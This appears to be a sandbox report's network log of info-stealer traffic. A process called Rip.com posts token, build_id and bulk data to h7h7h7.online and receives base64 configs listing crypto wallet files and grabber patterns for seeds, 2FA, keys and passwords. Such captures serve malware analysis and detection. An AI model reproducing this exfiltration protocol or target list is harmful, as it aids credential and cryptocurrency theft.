                                                                                                                                                                                                                                                                      2024-12-31 20:33:51 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:52 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      23192.168.2.449824116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC282OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----zua1n7ymycjwbaas0hvs
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 6990993
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 7a 75 61 31 6e 37 79 6d 79 63 6a 77 62 61 61 73 30 68 76 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 7a 75 61 31 6e 37 79 6d 79 63 6a 77 62 61 61 73 30 68 76 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 7a 75 61 31 6e 37 79 6d 79 63 6a 77 62 61 61 73 30 68 76 73 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------zua1n7ymycjwbaas0hvsContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------zua1n7ymycjwbaas0hvsContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------zua1n7ymycjwbaas0hvsCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:59 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      24192.168.2.449825116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:53 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----6fcjw4e3e3opzu3wb1va
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:53 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 63 6a 77 34 65 33 65 33 6f 70 7a 75 33 77 62 31 76 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 36 66 63 6a 77 34 65 33 65 33 6f 70 7a 75 33 77 62 31 76 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 36 66 63 6a 77 34 65 33 65 33 6f 70 7a 75 33 77 62 31 76 61 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------6fcjw4e3e3opzu3wb1vaContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------6fcjw4e3e3opzu3wb1vaContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------6fcjw4e3e3opzu3wb1vaCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:54 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:54 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      25192.168.2.449826116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:54 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----0r1n7qqimozmyusrqi58
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 30 72 31 6e 37 71 71 69 6d 6f 7a 6d 79 75 73 72 71 69 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 30 72 31 6e 37 71 71 69 6d 6f 7a 6d 79 75 73 72 71 69 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 30 72 31 6e 37 71 71 69 6d 6f 7a 6d 79 75 73 72 71 69 35 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------0r1n7qqimozmyusrqi58Content-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------0r1n7qqimozmyusrqi58Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------0r1n7qqimozmyusrqi58Cont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:55 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:55 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                      Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      26192.168.2.449827116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:56 UTC278OUTPOST / HTTP/1.1
